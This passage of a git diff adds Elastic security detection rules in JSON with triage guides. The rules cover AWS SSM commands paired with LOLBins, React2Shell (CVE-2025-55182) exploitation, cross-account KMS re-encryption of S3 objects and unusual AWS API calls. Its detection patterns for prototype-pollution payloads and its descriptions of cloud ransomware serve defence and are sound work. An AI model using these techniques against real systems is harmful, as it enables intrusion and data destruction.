LIKE \"%/document/orchestration/%/awsrunShellScript/%/_script.sh\"\n\n// LOLBins / GTFOBins on Linux\n| EVAL Esql.is_lolbin_process =\n Esql.is_endpoint_event AND NOT Esql.is_ssm_shell_process\n\n// Aggregate per SSM command ID\n| STATS\n // Core correlation counts & timing\n Esql.aws_cloudtrail_event_count = SUM(CASE(Esql.is_cloud_event, 1, 0)),\n Esql.endpoint_events_process_lolbin_count = SUM(CASE(Esql.is_lolbin_process, 1, 0)),\n Esql.endpoint_events_process_ssm_shell_count = SUM(CASE(Esql.is_ssm_shell_process, 1, 0)),\n Esql.aws_cloudtrail_first_event_ts = MIN(CASE(Esql.is_cloud_event, @timestamp, null)),\n Esql.endpoint_events_process_first_lolbin_ts = MIN(CASE(Esql.is_lolbin_process, @timestamp, null)),\n\n // AWS / CloudTrail identity & request context\n Esql_priv.aws_cloudtrail_user_identity_arn_values =\n VALUES(CASE(Esql.is_cloud_event, aws.cloudtrail.user_identity.arn, null)),\n Esql_priv.aws_cloudtrail_user_identity_access_key_id_values =\n VALUES(CASE(Esql.is_cloud_event, aws.cloudtrail.user_identity.access_key_id, null)),\n Esql_priv.user_name_values =\n VALUES(CASE(Esql.is_cloud_event, user.name, null)),\n\n // AWS environment / request metadata\n Esql.cloud_region_values = VALUES(CASE(Esql.is_cloud_event, cloud.region, null)),\n Esql.source_ip_values = VALUES(CASE(Esql.is_cloud_event, source.ip, null)),\n Esql.user_agent_original_values =\n VALUES(CASE(Esql.is_cloud_event, user_agent.original, null)),\n\n // Endpoint host & user context\n Esql.host_name_values = VALUES(CASE(Esql.is_endpoint_event, host.name, null)),\n Esql_priv.endpoint_user_name_values =\n VALUES(CASE(Esql.is_endpoint_event, user.name, null)),\n\n // SSM shell processes on endpoint\n Esql.process_command_line_ssm_shell_values =\n VALUES(CASE(Esql.is_ssm_shell_process, process.command_line, null)),\n Esql.process_pid_ssm_shell_values =\n VALUES(CASE(Esql.is_ssm_shell_process, process.pid, null)),\n\n // LOLBin processes on endpoint\n Esql.process_name_lolbin_values =\n VALUES(CASE(Esql.is_lolbin_process, process.name, null)),\n Esql.process_executable_lolbin_values =\n VALUES(CASE(Esql.is_lolbin_process, process.executable, null)),\n Esql.process_command_line_lolbin_values =\n VALUES(CASE(Esql.is_lolbin_process, process.command_line, null)),\n Esql.process_pid_lolbin_values =\n VALUES(CASE(Esql.is_lolbin_process, process.pid, null)),\n Esql.process_parent_command_line_lolbin_values =\n VALUES(CASE(Esql.is_lolbin_process, process.parent.command_line, null)),\n\n Esql.data_stream_namespace_values = VALUES(data_stream.namespace)\n BY Esql.aws_ssm_command_id\n\n// Detection condition: SSM SendCommand + AWS-RunShellScript + LOLBin on endpoint\n| WHERE Esql.aws_cloudtrail_event_count > 0\n AND Esql.endpoint_events_process_lolbin_count > 0\n AND DATE_DIFF(\n \"minutes\",\n Esql.endpoint_events_process_first_lolbin_ts,\n Esql.aws_cloudtrail_first_event_ts\n ) <= 5\n| SORT Esql.aws_cloudtrail_first_event_ts ASC\n| KEEP Esql.*, Esql_priv.*\n", + "references": [ + "https://www.mitiga.io/blog/abusing-the-amazon-web-services-ssm-agent-as-a-remote-access-trojan", + "https://www.kali.org/tools/pacu/", + "https://www.100daysofredteam.com/p/ghost-in-the-cloud-abusing-aws-ssm", + "https://hackingthe.cloud/aws/post_exploitation/run_shell_commands_on_ec2/", + "https://gtfobins.github.io/" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + }, + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.aws_cloudtrail_event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_first_event_ts", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.aws_ssm_command_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.cloud_region_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.endpoint_events_process_first_lolbin_ts", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.endpoint_events_process_lolbin_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.endpoint_events_process_ssm_shell_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_command_line_lolbin_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_command_line_ssm_shell_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_executable_lolbin_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_name_lolbin_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_parent_command_line_lolbin_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_pid_lolbin_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.process_pid_ssm_shell_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql_priv.aws_cloudtrail_user_identity_access_key_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql_priv.aws_cloudtrail_user_identity_arn_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql_priv.endpoint_user_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql_priv.user_name_values", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS EC2", + "Data Source: AWS SSM", + "Data Source: AWS Systems Manager", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1651", + "name": "Cloud Administration Command", + "reference": "https://attack.mitre.org/techniques/T1651/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 1 + }, + "id": "a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a8f7e9d4-3b2c-4d5e-8f1a-6c9b0e2d4a7f_1.json b/packages/security_detection_engine/kibana/security_rule/a8f7e9d4-3b2c-4d5e-8f1a-6c9b0e2d4a7f_1.json new file mode 100644 index 00000000000..8bc34543684 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a8f7e9d4-3b2c-4d5e-8f1a-6c9b0e2d4a7f_1.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects exploitation attempts targeting CVE-2025-55182, a critical remote code execution vulnerability in React Server Components (RSC) Flight protocol. The vulnerability allows attackers to execute arbitrary code on the server by sending specially crafted deserialization payloads that exploit prototype chain traversal to access the Function constructor. This rule focuses on high-fidelity indicators of active exploitation including successful command execution responses and prototype pollution attack patterns.", + "from": "now-9m", + "index": [ + "logs-network_traffic.http*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "React2Shell (CVE-2025-55182) Exploitation Attempt", + "note": "## Triage and analysis\n\n### Investigating React2Shell (CVE-2025-55182) Exploitation Attempt\n\nThis rule detects exploitation attempts targeting CVE-2025-55182, a critical remote code execution vulnerability in React's Flight protocol used by Next.js and other RSC implementations. The vulnerability stems from insecure prototype chain traversal in the Flight deserializer, allowing attackers to access `__proto__`, `constructor`, and ultimately the `Function` constructor to execute arbitrary code.\n\n### Possible investigation steps\n\n- Examine the full HTTP request body to identify the specific attack payload and command being executed.\n- Check the response body for `E{\"digest\":\"...\"}` patterns which contain command output from successful exploitation.\n- Identify the target application and verify if it runs vulnerable React (< 19.1.0) or Next.js (< 15.3.2) versions.\n- Review the source IP for other reconnaissance or exploitation attempts against web applications.\n- Check for the `Next-Action` header which is required for the exploit to work.\n- Correlate with process execution logs to identify if child processes (e.g., shell commands) were spawned by the Node.js process.\n\n### False positive analysis\n\n- Legitimate React Server Components traffic will NOT contain `__proto__`, `constructor:constructor`, or code execution patterns.\n- Security scanning tools like react2shell-scanner may trigger this rule during authorized penetration testing.\n- The combination of prototype pollution patterns with RSC-specific syntax is highly indicative of malicious activity.\n\n### Response and remediation\n\n- Immediately update affected applications: React >= 19.1.0, Next.js >= 15.3.2.\n- Block the source IP at the WAF/reverse proxy if exploitation is confirmed.\n- If HTTP 500 or 303 responses with `digest` output were observed, assume successful code execution and investigate for compromise.\n- Review server logs for evidence of command execution (file creation, network connections, process spawning).\n- Implement WAF rules to block requests containing `__proto__` or `constructor:constructor` in POST bodies.\n", + "query": "network where http.request.method == \"POST\" and\n(\n // Successful CVE-2025-55182 RCE - command output in digest\n (\n http.response.status_code in (500, 303) and\n http.response.body.content like~ \"*E{\\\"digest\\\"*\" and\n http.request.body.content regex~ \"\"\".*\\$[0-9]+:[a-zA-Z_0-9]+:[a-zA-Z_0-9]+.*\"\"\"\n ) or\n // Prototype pollution attempts in RSC Flight data (never legitimate)\n (\n http.request.body.content regex~ \"\"\".*\\$[0-9]+:[a-zA-Z_0-9]+:[a-zA-Z_0-9]+.*\"\"\" and\n (\n http.request.body.content like~ \"*__proto__*\" or\n http.request.body.content like~ \"*prototype*\"\n )\n )\n)\n", + "references": [ + "https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182", + "https://github.com/assetnote/react2shell-scanner", + "https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/", + "https://github.com/msanft/CVE-2025-55182" + ], + "related_integrations": [ + { + "package": "network_traffic", + "version": "^1.33.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "http.request.body.content", + "type": "wildcard" + }, + { + "ecs": true, + "name": "http.request.method", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.response.body.content", + "type": "wildcard" + }, + { + "ecs": true, + "name": "http.response.status_code", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "a8f7e9d4-3b2c-4d5e-8f1a-6c9b0e2d4a7f", + "severity": "high", + "tags": [ + "Domain: Network", + "Domain: Application", + "Domain: Web", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Network Packet Capture", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "a8f7e9d4-3b2c-4d5e-8f1a-6c9b0e2d4a7f_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_210.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_210.json index 118711d5459..9b70bad0c02 100644 --- a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_210.json +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_208.json b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_208.json index bc247547233..ea72300c996 100644 --- a/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_208.json +++ b/packages/security_detection_engine/kibana/security_rule/a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73_208.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_8.json b/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_8.json new file mode 100644 index 00000000000..c7ac92b4403 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_8.json @@ -0,0 +1,195 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the S3 CopyObject API where the destination object is encrypted using an AWS KMS key from an external AWS account. This behavior may indicate ransomware-style impact activity where an adversary with access to a misconfigured S3 bucket encrypts objects using a KMS key they control, preventing the bucket owner from decrypting their own data. This technique is a critical early signal of destructive intent or cross-account misuse.", + "false_positives": [ + "Cross-account KMS key usage may be legitimate in multi-account AWS Organizations architectures where centralized encryption keys are used for data governance or auditing workflows. Confirm whether the external KMS key belongs to an expected account before taking action. Data migration or cross-account backup workflows may legitimately re-encrypt S3 objects using a key in another account. Ensure these workflows are documented, tied to known IAM roles, and occur on predictable schedules." + ], + "from": "now-6m", + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "aws.cloudtrail.resources.arn", + "aws.cloudtrail.resources.type", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements", + "Esql.aws_cloudtrail_request_parameters_target_bucket_name", + "Esql.aws_cloudtrail_request_parameters_target_object_key", + "Esql.aws_cloudtrail_request_parameters_kms_key_account_id", + "Esql.aws_cloudtrail_request_parameters_kms_key_id" + ] + }, + "language": "esql", + "license": "Elastic License v2", + "name": "AWS S3 Object Encryption Using External KMS Key", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS S3 Object Encryption Using External KMS Key\n\nThis rule detects when an S3 `CopyObject` operation encrypts an object using a KMS key belonging to a different AWS account than the bucket owner. This behavior is unusual and a strong indicator of:\n\n- Cloud ransomware techniques, where adversaries encrypt data using a key only they control.\n- Cross-account privilege misuse, especially when an unauthorized principal has write access to S3.\n- Misconfigured bucket permissions, enabling principals from another account to perform privileged copy operations.\n- Early impact-stage activity in incidents where attackers prepare to destroy availability or deny the owner access.\n\nThe rule uses ESQL to identify cases where the `cloud.account.id` (bucket owner) differs from the dissected `kms_key_account_id` used for encrypting the new object version.\n\n\n#### Possible investigation steps\n\n**Identify the actor and access pathway**\n- Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id`.\n- Check whether the caller is:\n - A legitimate cross-account automation role, \n - A compromised IAM user or workload identity, or \n - A federated identity behaving outside of normal patterns.\n- Inspect `user_agent.original` to determine whether the action came from the AWS Console, CLI, SDK, or unusual tooling.\n\n**Analyze the encryption behavior**\n- Inspect the dissected KMS key fields:\n - `Esql.aws_cloudtrail_request_parameters_kms_key_account_id`\n - `Esql.aws_cloudtrail_request_parameters_kms_key_id`\n- Confirm whether the external key:\n - Belongs to an attacker-controlled account, \n - Is unknown to your organization, or \n - Lives in a shared or security tooling account.\n\n**Assess the objects affected**\n- Review:\n - `Esql.aws_cloudtrail_request_parameters_target_bucket_name`\n - `Esql.aws_cloudtrail_request_parameters_target_object_key`\n- Identify:\n - Whether objects were overwritten or new encrypted copies were created.\n - The sensitivity or criticality of the affected data.\n - Whether object versioning is enabled (important for recovery).\n\n**Correlate surrounding access patterns**\nPivot in CloudTrail on:\n- The same access key ID \n- The same IAM principal \n- Affected bucket ARN \n\nLook for:\n- `DeleteObject` or `DeleteObjects` calls (common in ransomware behavior)\n- Mass enumeration prior to the event (`ListObjectsV2`, `GetObject`)\n- Other impact-stage actions (`PutBucketPolicy`, `PutBucketAcl`, disabling logging)\n- Attempts to encrypt additional objects in rapid succession\n\n**Evaluate bucket permissions and exposure**\nReview:\n- S3 bucket policy changes\n- IAM roles with `s3:PutObject` or `s3:PutObjectAcl` permissions\n- Whether unintended cross-account `Principal` entries exist\n- Whether the KMS key policy explicitly trusts your account or a foreign one\n\n**Validate business justification**\n- Confirm with storage, data engineering, or application teams whether:\n - Any migration, transformation, or backup workflows should be encrypting objects cross-account.\n - Scheduled jobs or CI/CD pipelines were operating at the time of the event.\n\n### False positive analysis\n\n- **Expected cross-account encryption** \n Many organizations use centralized encryption accounts or shared security accounts. Validate:\n - Whether the KMS key account is part of your AWS Organization\n - Whether the workflow, role, or application is documented\n - Whether the principal routinely performs CopyObject operations\n\n### Response and remediation\n\n**Contain and prevent further impact**\n- Immediately restrict S3 write access for the principal involved.\n- If the KMS key is attacker-controlled, the impacted objects may be unrecoverable without versioning.\n- If object versioning is disabled, enable it on the affected bucket to strengthen future resilience.\n\n**Investigate scope and severity**\n- Identify:\n - Additional objects encrypted using external keys\n - Related suspicious actions (delete, modify, exfiltration events)\n - Whether any ransom markers or unauthorized files were uploaded\n- Validate whether the external KMS key grants *decrypt* permission back to the bucket owner (rare in attacker use).\n\n**Recover and secure the bucket**\n- Restore accessible previous versions if versioning is enabled.\n- Revoke unauthorized access key pairs or session credentials.\n- Audit bucket policies, ACLs, and IAM conditions (`aws:PrincipalArn`, `aws:SourceAccount`, `aws:SourceArn`).\n- Tighten cross-account access controls:\n - Remove unintended `Principal` clauses\n - Restrict KMS usage to known accounts\n - Enforce SCPs that block cross-account KMS use unless explicitly approved\n\n**Long-term hardening**\n- Integrate object-level access logging and S3 server access logging into security monitoring.\n- Add AWS Config rules (or Security Hub controls) detecting:\n - Public buckets\n - Cross-account access to S3\n - KMS policies permitting foreign principals\n- Document required cross-account workflows and add explicit allowlists.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "from logs-aws.cloudtrail-* metadata _id, _version, _index\n\n// any successful S3 copy event\n| where\n event.dataset == \"aws.cloudtrail\"\n and event.provider == \"s3.amazonaws.com\"\n and event.action == \"CopyObject\"\n and event.outcome == \"success\"\n\n// dissect request parameters to extract KMS key info and target object info\n| dissect aws.cloudtrail.request_parameters\n \"{%{?bucketName}=%{Esql.aws_cloudtrail_request_parameters_target_bucket_name},%{?x-amz-server-side-encryption-aws-kms-key-id}=%{?arn}:%{?aws}:%{?kms}:%{?region}:%{Esql.aws_cloudtrail_request_parameters_kms_key_account_id}:%{?key}/%{Esql.aws_cloudtrail_request_parameters_kms_key_id},%{?Host}=%{?tls.client.server.name},%{?x-amz-server-side-encryption}=%{?server_side_encryption},%{?x-amz-copy-source}=%{?bucket.object.name},%{?key}=%{Esql.aws_cloudtrail_request_parameters_target_object_key}}\"\n\n// detect cross-account key usage\n| where cloud.account.id != Esql.aws_cloudtrail_request_parameters_kms_key_account_id\n\n// keep ECS and dissected fields\n| keep\n @timestamp,\n data_stream.namespace,\n user.name,\n user_agent.original,\n source.ip,\n aws.cloudtrail.user_identity.arn,\n aws.cloudtrail.user_identity.type,\n aws.cloudtrail.user_identity.access_key_id,\n aws.cloudtrail.resources.arn,\n aws.cloudtrail.resources.type,\n event.action,\n event.outcome,\n cloud.account.id,\n cloud.region,\n aws.cloudtrail.request_parameters,\n aws.cloudtrail.response_elements,\n Esql.aws_cloudtrail_request_parameters_target_bucket_name,\n Esql.aws_cloudtrail_request_parameters_target_object_key,\n Esql.aws_cloudtrail_request_parameters_kms_key_account_id,\n Esql.aws_cloudtrail_request_parameters_kms_key_id\n", + "references": [ + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingKMSEncryption.html/", + "https://docs.aws.amazon.com/kms/latest/APIReference/API_GenerateDataKey.html/", + "https://www.gem.security/post/cloud-ransomware-a-new-take-on-an-old-attack-pattern/", + "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + }, + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "@timestamp", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_request_parameters_kms_key_account_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_request_parameters_kms_key_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_request_parameters_target_bucket_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.aws_cloudtrail_request_parameters_target_object_key", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.resources.arn", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.resources.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.response_elements", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.access_key_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.arn", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "cloud.account.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "cloud.region", + "type": "keyword" + }, + { + "ecs": true, + "name": "data_stream.namespace", + "type": "constant_keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user_agent.original", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ab8f074c-5565-4bc4-991c-d49770e19fc9", + "setup": "AWS S3 data event types need to be enabled in the CloudTrail trail configuration for CopyObject events.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Data Source: AWS KMS", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 8 + }, + "id": "ab8f074c-5565-4bc4-991c-d49770e19fc9_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1_212.json b/packages/security_detection_engine/kibana/security_rule/ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1_212.json new file mode 100644 index 00000000000..ee7301aa988 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1_212.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected an AWS API command that, while not inherently suspicious or abnormal, is being made by a user context that does not normally use the command. This can be the result of compromised credentials or keys as someone uses a valid account to persist, move laterally, or exfiltrate data.", + "false_positives": [ + "New or unusual user command activity can be due to manual troubleshooting or reconfiguration; changes in cloud automation scripts or workflows; adoption of new services; or changes in the way services are used." + ], + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "rare_method_for_a_username", + "name": "Unusual AWS Command for a User", + "note": "## Triage and analysis\n\n### Investigating Unusual AWS Command for a User\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity when deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is being made by a user context that does not normally use the command. This can be the result of compromised credentials or keys as someone uses a valid account to persist, move laterally, or exfiltrate data.\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the calling IAM user.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal time of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + } + ], + "risk_score": 21, + "rule_id": "ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from AWS.\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### AWS Integration Setup\nThe AWS integration allows you to collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"aws\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAWS\u201d and select the integration to see more details about it.\n- Click \u201cAdd AWS\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201caws\u201d to an existing or 